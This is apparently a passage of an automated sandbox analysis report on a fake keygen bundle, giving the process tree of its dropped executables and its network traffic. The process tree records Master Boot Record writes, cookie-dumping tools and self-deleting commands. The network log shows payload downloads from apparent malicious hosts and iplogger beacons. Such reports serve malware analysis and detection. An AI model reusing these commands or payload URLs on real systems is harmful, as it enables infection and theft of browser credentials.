      C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
      4⤵
      PID:1592
- C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
  keygen-step-1.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1160
- C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
  keygen-step-3.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:932
- C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
  keygen-step-4.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3752
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1728
  - - C:\Windows\SysWOW64\msiexec.exe
      msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
      4⤵
      Enumerates connected drives
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
      C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp1
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Writes to the Master Boot Record (MBR)
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Checks SCSI registry key(s)
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:5064
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        5⤵
        
        PID:3592
    - - C:\Users\Admin\AppData\Roaming\1730899694706.exe
        
        "C:\Users\Admin\AppData\Roaming\1730899694706.exe" /sjson "C:\Users\Admin\AppData\Roaming\1730899694706.txt"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3076
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        5⤵
        
        PID:4980
    - - C:\Users\Admin\AppData\Roaming\1730899701565.exe
        
        "C:\Users\Admin\AppData\Roaming\1730899701565.exe" /sjson "C:\Users\Admin\AppData\Roaming\1730899701565.txt"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4092
    - - C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2684
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:436
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3112
  - - C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
      C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp1
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Drops Chrome extension
      Writes to the Master Boot Record (MBR)
      System Location Discovery: System Language Discovery
      Checks SCSI registry key(s)
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2400
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3056
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:1748
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of WriteProcessMemory
        
        PID:976
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4692
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:396
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5000
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - System Location Discovery: System Language Discovery
    PID:2996
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 1484
      4⤵
      Program crash
      PID:1160
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3876
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe" >> NUL
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      PID:4268
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4880
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4232
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\installer.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\installer.exe"
      4⤵
      Executes dropped EXE
      PID:2232
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\gdrrr.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gdrrr.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:3760
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3332
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:936

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2064
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding FE04C6CB747C1F6FA10C5F771D755675 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4424
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:4936

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:1928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2996 -ip 2996
1⤵
PID:2092

Network

DNS

www.wsfsd33sdfer.com

keygen-step-3.exe

Remote address:

8.8.8.8:53

Request

www.wsfsd33sdfer.com

IN A

Response
DNS

kvaka.li

keygen-step-1.exe

Remote address:

8.8.8.8:53

Request

kvaka.li

IN A

Response
DNS

kvaka.li

keygen-step-1.exe

Remote address:

8.8.8.8:53

Request

kvaka.li

IN A

Response
DNS

228.249.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

fae6d2a1ac2748db.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

fae6d2a1ac2748db.xyz

IN A

Response

fae6d2a1ac2748db.xyz

IN A

162.249.67.147
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

133.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.32.126.40.in-addr.arpa

IN PTR

Response
DNS

62e4cb87e7e0fe29.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

62e4cb87e7e0fe29.xyz

IN A

Response
DNS

afc7178613230274.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

afc7178613230274.xyz

IN A

Response
DNS

e85c5b0caef0cd16.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

e85c5b0caef0cd16.xyz

IN A

Response
DNS

bf2614e472c0e137.xyz

Setup.exe

Remote address:

8.8.8.8:53

Request

bf2614e472c0e137.xyz

IN A

Response
DNS

62e4cb87e7e0fe29.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

62e4cb87e7e0fe29.xyz

IN A

Response
DNS

e85c5b0caef0cd16.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

e85c5b0caef0cd16.xyz

IN A

Response
DNS

afc7178613230274.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

afc7178613230274.xyz

IN A

Response
DNS

d8b2d8b1562e74f4.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

d8b2d8b1562e74f4.xyz

IN A

Response
DNS

17eb4bd0cf2216ad.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

17eb4bd0cf2216ad.xyz

IN A

Response
DNS

167.205.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.205.23.2.in-addr.arpa

IN PTR

Response

167.205.23.2.in-addr.arpa

IN PTR

a2-23-205-167deploystaticakamaitechnologiescom
DNS

6d8b0272c433fd35.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

6d8b0272c433fd35.xyz

IN A

Response
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

241.42.69.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.42.69.40.in-addr.arpa

IN PTR

Response
DNS

75.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.117.19.2.in-addr.arpa

IN PTR

Response

75.117.19.2.in-addr.arpa

IN PTR

a2-19-117-75deploystaticakamaitechnologiescom
DNS

iplogger.org

installer.exe

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

104.26.3.46

iplogger.org

IN A

172.67.74.161

iplogger.org

IN A

104.26.2.46
GET

https://iplogger.org/1F9K57

file.exe

Remote address:

104.26.3.46:443

Request

GET /1F9K57 HTTP/1.1
Host: iplogger.org

Response

HTTP/1.1 403 Forbidden

Date: Wed, 06 Nov 2024 13:28:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: /3yJK7e+9kXAB3K4YFfFzzcvcK2LvN8WNy4g20OrrgCv+2u+Cw2gvRqBoh4DDjgbRIekgma0qPYtHNleyJkbOg0CfzB3Q+ujJwbCApYzKNlatkFpJicLVdUjSE7QSkqoIOSFv/PEgyclY1x+LmAYlw==$q+CN5W/sDn0Tob3MhrkuXg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8QXeOKj3ufwblohdO5XxCrckNh3%2FmGM7mVhSJhQ7MTeKrtCIgRDRFVDGi7PLb1wdp0Aztt5UNIHWQBCJaQ7C2q1WFKD3WOq2gJm7JBqQR1TrQ7IvxnufJ%2BJsSMmWpw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8de56d8adcef6100-LHR
server-timing: cfL4;desc="?proto=TCP&rtt=21016&sent=5&recv=9&lost=0&retrans=0&sent_bytes=3286&recv_bytes=345&delivery_rate=196524&cwnd=253&unsent_bytes=0&cid=e4672de62c60f49a&ts=291&x=0"
DNS

c.pki.goog

file.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.187.227
GET

http://c.pki.goog/r/gsr1.crl

file.exe

Remote address:

142.250.187.227:80

Request

GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Wed, 06 Nov 2024 12:54:28 GMT
Expires: Wed, 06 Nov 2024 13:44:28 GMT
Cache-Control: public, max-age=3000
Age: 2050
Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
GET

http://c.pki.goog/r/r4.crl

file.exe

Remote address:

142.250.187.227:80

Request

GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Wed, 06 Nov 2024 12:54:28 GMT
Expires: Wed, 06 Nov 2024 13:44:28 GMT
Cache-Control: public, max-age=3000
Age: 2050
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

arganaif.org

file.exe

Remote address:

8.8.8.8:53

Request

arganaif.org

IN A

Response

arganaif.org

IN A

173.212.247.85
GET

https://arganaif.org/vendor/tilt/fw1.php

file.exe

Remote address:

173.212.247.85:443

Request

GET /vendor/tilt/fw1.php HTTP/1.1
Host: arganaif.org

Response

HTTP/1.1 404 Not Found

Date: Wed, 06 Nov 2024 13:28:39 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET

https://arganaif.org/vendor/tilt/fw2.php

file.exe

Remote address:

173.212.247.85:443

Request

GET /vendor/tilt/fw2.php HTTP/1.1
Host: arganaif.org

Response

HTTP/1.1 404 Not Found

Date: Wed, 06 Nov 2024 13:28:39 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET

https://arganaif.org/vendor/tilt/fw3.exe

file.exe

Remote address:

173.212.247.85:443

Request

GET /vendor/tilt/fw3.exe HTTP/1.1
Host: arganaif.org

Response

HTTP/1.1 404 Not Found

Date: Wed, 06 Nov 2024 13:28:39 GMT
Server: Apache
Last-Modified: Sun, 24 Jan 2021 12:48:15 GMT
Accept-Ranges: bytes
Content-Length: 1398
Content-Type: text/html
GET

https://arganaif.org/vendor/tilt/fw4.exe

file.exe

Remote address:

173.212.247.85:443

Request

GET /vendor/tilt/fw4.exe HTTP/1.1
Host: arganaif.org

Response

HTTP/1.1 404 Not Found

Date: Wed, 06 Nov 2024 13:28:39 GMT
Server: Apache
Last-Modified: Sun, 24 Jan 2021 12:48:15 GMT
Accept-Ranges: bytes
Content-Length: 1398
Content-Type: text/html
GET

https://arganaif.org/vendor/tilt/fw5.exe

file.exe

Remote address:

173.212.247.85:443

Request

GET /vendor/tilt/fw5.exe HTTP/1.1
Host: arganaif.org

Response

HTTP/1.1 404 Not Found

Date: Wed, 06 Nov 2024 13:28:39 GMT
Server: Apache
Last-Modified: Sun, 24 Jan 2021 12:48:15 GMT
Accept-Ranges: bytes
Content-Length: 1398
Content-Type: text/html
GET

https://arganaif.org/vendor/tilt/soft.exe

file.exe

Remote address:

173.212.247.85:443

Request

GET /vendor/tilt/soft.exe HTTP/1.1
Host: arganaif.org

Response

HTTP/1.1 404 Not Found

Date: Wed, 06 Nov 2024 13:28:39 GMT
Server: Apache
Last-Modified: Sun, 24 Jan 2021 12:48:15 GMT
Accept-Ranges: bytes
Content-Length: 1398
Content-Type: text/html
DNS

46.3.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

46.3.26.104.in-addr.arpa

IN PTR

Response
DNS

227.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.187.250.142.in-addr.arpa

IN PTR

Response

227.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f31e100net
DNS

85.247.212.173.in-addr.arpa

Remote address:

8.8.8.8:53

Request

85.247.212.173.in-addr.arpa

IN PTR

Response

85.247.212.173.in-addr.arpa

IN PTR

vps3 caphostingcom
DNS

233.38.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.38.18.104.in-addr.arpa

IN PTR

Response
GET

https://iplogger.org/1F7K57

file.exe

Remote address:

104.26.3.46:443

Request

GET /1F7K57 HTTP/1.1
Host: iplogger.org

Response

HTTP/1.1 403 Forbidden

Date: Wed, 06 Nov 2024 13:28:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: GIS1K/+Wr73mHOfIAa98Y5v9xXGjBmIjHs+fRPYDbzvtkqLqAi45HU6B7B1veLwYUMlozP3m3U9G39juOSzHsKLPmFau5rR3Ns8ecQ7xs+oJ68A82HdOfGP73UFYy4BE9XcYC8NQNDu5nsIk0UYdcA==$NpT48+o/cjEFWmb9fpKpUA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lV7vdLQN%2BGH2aogKzPYUtmaM0Jb91ZYLRZahP%2BzqCTRsWvqWYh9FBqf1BP0GZDEtn8cq6VPyOPV2m4dKeIiIf8gHJYQnOAWolqbb9mCplUsF2WAkkGLc9yMX1h64Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8de56d9039d471fe-LHR
server-timing: cfL4;desc="?proto=TCP&rtt=21848&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=495&delivery_rate=66053&cwnd=250&unsent_bytes=0&cid=44fdac675562f061&ts=42&x=0"
DNS

cryptobstar.xyz

installer.exe

Remote address:

8.8.8.8:53

Request

cryptobstar.xyz

IN A

Response
GET

https://iplogger.org/1hh687

installer.exe

Remote address:

104.26.3.46:443

Request

GET /1hh687 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; WOW64; Trident/7.0; Sleipnir6/6.4.4; SleipnirSiteUpdates/6.4.4)
Host: iplogger.org
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Wed, 06 Nov 2024 13:28:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 8327
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: p4HgZCIY3Rf+SBJxpQanpskZe5CBaz/rZgdRNQ2lLgKYV0dSSFrzvXy/2IkoOgI/V8W3sxNUbfX2JupouDepMC2aRyc4RmGC7CHpla9/MWC3ib4nDvZ5LDJFi2MFgRD+Nt36ACYlZyn3fqmfisS9+A==$tQGNnzhHSnxprp8uba76+Q==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZT1SqAkinrULfTjvkEoQ52Rd%2BY9ufGWhS1pZQPjE4sG54vRfveewQ2vHq9gboC7kWrpNk7d0iOvVVQU6SpT5z1sANSyhUcZl34WfV4NX8ZC5SeLmAW0bZ%2FJVpIZEAA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8de56da29fec60dd-LHR
server-timing: cfL4;desc="?proto=TCP&rtt=21853&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2990&recv_bytes=494&delivery_rate=189595&cwnd=253&unsent_bytes=0&cid=58ee491874c2759b&ts=101&x=0"
DNS

ip-api.com

gdrrr.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/

gdrrr.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Wed, 06 Nov 2024 13:28:43 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 289
Access-Control-Allow-Origin: *
X-Ttl: 57
X-Rl: 43
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

www.facebook.com

gdrrr.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

163.70.151.35
GET

https://www.facebook.com/

gdrrr.exe

Remote address:

163.70.151.35:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 302 Found

Location: https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2F
reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0"
